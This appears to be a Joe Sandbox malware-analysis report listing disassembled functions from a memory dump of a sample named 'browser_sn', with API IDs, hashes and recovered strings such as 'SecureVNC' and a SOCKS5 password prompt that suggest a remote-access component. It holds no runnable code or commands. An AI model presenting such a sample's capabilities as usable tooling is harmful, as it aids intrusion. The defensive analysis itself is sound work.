                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$DeleteEnterEventLeave
                                                                            • String ID:
                                                                            • API String ID: 3772564070-0
                                                                            • Opcode ID: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                            • Instruction ID: 4d25a717ec61e4dc0500db684256215ba30cae0a3d272816f8efc1320f3d7fcb
                                                                            • Opcode Fuzzy Hash: 678031ac42c66a5cc385a0b69a6c3c5d1fab056847b98d7cff6dccc56ed1addc
                                                                            • Instruction Fuzzy Hash: 0821DB65919E8685FB54DF16E85437423B0AFA9B4EF440131CD8EC2B70CFBCA495D351
                                                                            Function 00007FF6C2C17520 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
                                                                            • String ID:
                                                                            • API String ID: 540623443-0
                                                                            • Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                                            • Instruction ID: df222387ff6578b016a7a6945ad518dc81936a048884ce32cf5bc121b702e58d
                                                                            • Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                                            • Instruction Fuzzy Hash: 72113922A28A4286DBC0CF61E4816B833B4FB48BC9F405432DF8E86714DFBCD099C701
                                                                            Function 00007FF6C2B8BCB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recvsend
                                                                            • String ID: Enter SOCKS5 password for %s@%s:
                                                                            • API String ID: 740075404-2439350543
                                                                            • Opcode ID: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
                                                                            • Instruction ID: 75643eb8b4a0231e68596cc511ab4b92688dd26d8c4192612151e8803aeb0072
                                                                            • Opcode Fuzzy Hash: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
                                                                            • Instruction Fuzzy Hash: 9151B462608A8284E7708F39A4403B9AA90FB4A7BDF545336EFADC3BD5DE6CD505C700
                                                                            Function 00007FF6C2C39748 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo
                                                                            • String ID: B
                                                                            • API String ID: 2959964966-1255198513
                                                                            • Opcode ID: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                            • Instruction ID: d7ee87a07979a5cf3304eebc4174337d3c4f9d87c0b3c447dffa7ebd1023270b
                                                                            • Opcode Fuzzy Hash: fae824a938474a811c26b963b90f3490e738d7e0b0a4b014d759f685275f7447
                                                                            • Instruction Fuzzy Hash: 11317C32A1862288E791DF65A4404ED37B4BF487ADF640936EF9D93BC8CEB8D402C301
                                                                            Function 00007FF6C2C44AFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo
                                                                            • String ID: SecureVNC;0;0x%08x;%s
                                                                            • API String ID: 2959964966-2465057312
                                                                            • Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                            • Instruction ID: 39b1efb40beea8efccbded25cd4c3cfd92d7db69f0254ca519d72a6097e5e815
                                                                            • Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                                            • Instruction Fuzzy Hash: B7219336B14B5189E761DF61A8405BE76B5BB087ADB640136EF9C93B88CEB8D401C340
                                                                            Function 00007FF6C2B92FE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryFileModuleName
                                                                            • String ID: " -service
                                                                            • API String ID: 3981628254-877726483
                                                                            • Opcode ID: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                            • Instruction ID: 4859e83ca987a927a91df604da13ae07717951af0e9c8d030e5fe0399e980652
                                                                            • Opcode Fuzzy Hash: 652a7e476fb5583efac58b4f6f8a379321410797b9c15688e010ce01b59f6f92
                                                                            • Instruction Fuzzy Hash: 1B318221A08AC185E7659B20A8553B937B0FF99359F444236DBEC877D5DFACD129C700
                                                                            Function 00007FF6C2C389E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo
                                                                            • String ID: B
                                                                            • API String ID: 2959964966-1255198513
                                                                            • Opcode ID: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                                            • Instruction ID: c17c5ccadd501ef072f060d0dc7e7ec373f470cf2f0a27ce74053dff3e2b4478
                                                                            • Opcode Fuzzy Hash: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                                            • Instruction Fuzzy Hash: 6811603261874186EB609F15A4842AEB6B0FB88B99F584631EFDD87B95CEBCD540CB04
                                                                            Function 00007FF6C2B941E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Item$MessageSend_errno_invalid_parameter_noinfo
                                                                            • String ID: <
                                                                            • API String ID: 2439412506-4251816714
                                                                            • Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                            • Instruction ID: 8092bc11acb33373adbb4ce5556d68951199077285b25e2f0f02261f0226d648
                                                                            • Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                                            • Instruction Fuzzy Hash: 5A116A32A18A4186EBA08F12E4107AAB370FB88B48F545031EF8D47B59CF7CD916CB40
                                                                            Function 00007FF6C2C38B14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _errno_invalid_parameter_noinfo
                                                                            • String ID: I
                                                                            • API String ID: 2959964966-3707901625
                                                                            • Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                            • Instruction ID: 1298589e7dca7f131d647cfb5e11c0530f468c6c27ae3e0d7c54e582eca8428e
                                                                            • Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                                            • Instruction Fuzzy Hash: B211A072A08B4085EB609F12A5402AAB7A4FB94FE8F184632EFDC47B95CF7CD5008B00
                                                                            Function 00007FF6C2B8D9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$MappingOpenView
                                                                            • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                                            • API String ID: 3439327939-3305976270
                                                                            • Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                            • Instruction ID: 6a48c4cf07c72a27af7d7cbce8433c0568d543ac9ce06073f685be0fed798869
                                                                            • Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                                            • Instruction Fuzzy Hash: 94018E32509BC186E760CF64E44136AB3A0FB84B68F584235DBEA42B94CFBCD450C740
                                                                            Function 00007FF6C2B8DA70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$MappingOpenView
                                                                            • String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
                                                                            • API String ID: 3439327939-2897898322
                                                                            • Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                            • Instruction ID: ecd079f9f80a8caf21192032a4f65d1ea8a4721113e651d9e37bfa233d3b25d1
                                                                            • Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                                            • Instruction Fuzzy Hash: 6E017C32508B9186E760CF64E44066AB3A0FB88B69F550335DAEA42B94CFB8D050C700
                                                                            Function 00007FF6C2B8A200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressFreeLibraryProc
                                                                            • String ID: DllGetVersion
                                                                            • API String ID: 3013587201-2861820592
                                                                            • Opcode ID: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                                            • Instruction ID: 5125bf6cc684ee2a75abed6e64647700f26ea4eb7fb7bda9ecb103ef039b3ae7
                                                                            • Opcode Fuzzy Hash: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                                            • Instruction Fuzzy Hash: D1011E2161C74182E7608F55F48003A76A0FB88B99F44453AEBDE82758DF7CD554CB00
                                                                            Function 00007FF6C2B9E4B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalDeleteSection
                                                                            • String ID: vncclient.cpp : update thread gone
                                                                            • API String ID: 166494926-1446885542
                                                                            • Opcode ID: 76988618689ac5a3949e64293531639e25bde67ea752ce089384153fb9c5267d
                                                                            • Instruction ID: f931113b123b7b0fb1d6a3670051c5e4cab51f9d7177e6d54bc1129562c74fc3
                                                                            • Opcode Fuzzy Hash: 76988618689ac5a3949e64293531639e25bde67ea752ce089384153fb9c5267d
                                                                            • Instruction Fuzzy Hash: AC015735A08A8291D680DF10D6503B86331FB49BA9F644632DFAD877A5DF6CE069C340
                                                                            Function 00007FF6C2B8D8C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
